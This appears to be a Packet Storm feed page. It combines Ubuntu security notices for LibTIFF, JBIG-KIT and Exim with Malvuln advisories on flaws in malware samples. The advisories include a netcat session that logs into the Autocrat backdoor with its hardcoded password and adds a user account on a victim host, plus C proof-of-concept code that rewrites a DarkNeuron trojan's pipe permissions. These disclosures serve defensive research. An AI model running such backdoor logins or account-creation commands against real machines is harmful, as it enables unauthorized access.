Ubuntu Security Notice 5743-1 - It was discovered that LibTIFF incorrectly handled certain malformed images. If a user or automated system were tricked into opening a specially crafted image, a remote attacker could crash the application, leading to a denial of service, or possibly execute arbitrary code with user privileges.

    ==========================================================================Ubuntu Security Notice USN-5743-1November 24, 2022tiff vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:LibTIFF could be made to crash or run programs as your login if itopened a specially crafted file.Software Description:- tiff: Tag Image File Format (TIFF) libraryDetails:It was discovered that LibTIFF incorrectly handled certain malformedimages. If a user or automated system were tricked into opening a specially crafted image, a remote attacker could crash the application, leading to a denial of service, or possibly execute arbitrary code with user privileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libtiff-tools                   4.0.6-1ubuntu0.8+esm8   libtiff5                         4.0.6-1ubuntu0.8+esm8In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5743-1   CVE-2022-3970

Ubuntu Security Notice USN-5743-1

Backdoor.Win32.Autocrat.b malware suffers from a weak hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.Autocrat.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: AutocratType: PE32MD5: 4262a8b52b902aa2e6bf02a156d1b8d4Vuln ID: MVID-2022-0660Dropped files: srvsupp.exeDisclosure: 11/24/2022Exploit/PoC:C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536Login:autocratWinShell v5.0 (C)2002 janker.org? for helpCMD>?i Installr Removep Pathb reBootd shutDowns Shellx eXitq QuitDownload:CMD>http://.../srv.exe? for helpCMD>sMicrosoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user apparitionsec 666 /addnet user apparitionsec 666 /addThe command completed successfully.C:\Users\Victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Autocrat.b MVID-2022-0660 Weak Hardcoded Credential

Ubuntu Security Notice 5742-1 - It was discovered that JBIG-KIT incorrectly handled decoding certain large image files. If a user or automated system using JBIG-KIT were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5742-1  
November 24, 2022

jbigkit vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

JBIG-KIT could be made to crash if it opened a specially crafted file.

Software Description:  
- jbigkit: JBIG1 data compression library

Details:

It was discovered that JBIG-KIT incorrectly handled decoding certain large  
image files. If a user or automated system using JBIG-KIT were tricked into  
opening a specially crafted file, an attacker could possibly use this issue  
to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   jbigkit-bin                     2.1-3.1ubuntu0.22.10.1  
   libjbig0                        2.1-3.1ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   jbigkit-bin                     2.1-3.1ubuntu0.22.04.1  
   libjbig0                        2.1-3.1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   jbigkit-bin                     2.1-3.1ubuntu0.20.04.1  
   libjbig0                        2.1-3.1ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
   jbigkit-bin                     2.1-3.1ubuntu0.18.04.1  
   libjbig0                        2.1-3.1ubuntu0.18.04.1

Ubuntu 16.04 ESM:  
   jbigkit-bin                     2.1-3.1ubuntu0.1~esm1  
   libjbig0                        2.1-3.1ubuntu0.1~esm1

Ubuntu 14.04 ESM:  
   jbigkit-bin                     2.0-2ubuntu4.1+esm1  
   libjbig0                        2.0-2ubuntu4.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5742-1  
   CVE-2017-9937

Package Information:  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.20.04.1  
https://launchpad.net/ubuntu/+source/jbigkit/2.1-3.1ubuntu0.18.04.1

Ubuntu Security Notice USN-5742-1

Win32.Ransom.Conti ransomware fails to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/99e55ce93392068c970384ab24a0e13d.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Win32.Ransom.ContiVulnerability: Crypto Logic FlawDescription: Conti ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample, others variants are unknown as they were not yet tested.E.g. Test.exe.docxTest.exe.pdfTested successfully in a virtual machine environment.Family: ContiType: PE32MD5: 99e55ce93392068c970384ab24a0e13dVuln ID: MVID-2022-0662Disclosure: 11/25/2022Video PoC URL:https://www.youtube.com/watch?v=rjxCII_e6xQExploit/PoC:Create files with ".exe" within the filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Win32.Ransom.Conti MVID-2022-0662 Cryptography Logic Flaw

Trojan.Win32.DarkNeuron.gen malware creates an IPC pipe with a NULL DACL allowing RW for the Everyone user.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Trojan.Win32.DarkNeuron.genVulnerability: Named Pipe Null DACLFamily: DarkNeuron (Turla Group)Type: PE32MD5: d891c9374ccb2a4cae2274170e8644d8Vuln ID: MVID-2022-0661Disclosure: 11/24/2022Description: The malware process "NCSC.exe" creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.\\.\Pipe\Winsock2\baseapi_http  RW Everyone  RW BUILTIN\AdministratorsLocal low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.Exploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exeMD5: d891c9374ccb2a4cae2274170e8644d8NamedPipe Exploit Deny Access to EveryoneBy Malvuln Nov of 2022**/#define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2\\baseapi_http"int main(void){  HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);  PACL pOldDACL = NULL;  PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){       printf("%d", GetLastError());   return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){    printf("%d", GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){      printf("%d", GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("%d", GetLastError());     return 1;           }else{        printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n");        printf("By Malvuln\n");        printf("Nov of 2022\n");      }      LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);    system("pause");return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32.DarkNeuron.gen MVID-2022-0661 Named Pipe NULL DACL

Ubuntu Security Notice 5741-1 - It was discovered that Exim incorrectly handled certain regular expressions. An attacker could use this issue to cause Exim to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5741-1  
November 24, 2022

exim4 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Exim could be made to crash or run programs if it processed specially  
crafted regular expressions.

Software Description:  
- exim4: Exim is a mail transport agent

Details:

It was discovered that Exim incorrectly handled certain regular  
expressions. An attacker could use this issue to cause Exim to crash,  
resulting in a denial of service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   exim4-base                      4.96-3ubuntu1.1  
   exim4-daemon-heavy              4.96-3ubuntu1.1  
   exim4-daemon-light              4.96-3ubuntu1.1

Ubuntu 22.04 LTS:  
   exim4-base                      4.95-4ubuntu2.2  
   exim4-daemon-heavy              4.95-4ubuntu2.2  
   exim4-daemon-light              4.95-4ubuntu2.2

Ubuntu 20.04 LTS:  
   exim4-base                      4.93-13ubuntu1.7  
   exim4-daemon-heavy              4.93-13ubuntu1.7  
   exim4-daemon-light              4.93-13ubuntu1.7

Ubuntu 18.04 LTS:  
   exim4-base                      4.90.1-1ubuntu1.10  
   exim4-daemon-heavy              4.90.1-1ubuntu1.10  
   exim4-daemon-light              4.90.1-1ubuntu1.10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5741-1  
   CVE-2022-3559

Package Information:  
   https://launchpad.net/ubuntu/+source/exim4/4.96-3ubuntu1.1  
   https://launchpad.net/ubuntu/+source/exim4/4.95-4ubuntu2.2  
   https://launchpad.net/ubuntu/+source/exim4/4.93-13ubuntu1.7  
   https://launchpad.net/ubuntu/+source/exim4/4.90.1-1ubuntu1.10

Source

Packet Storm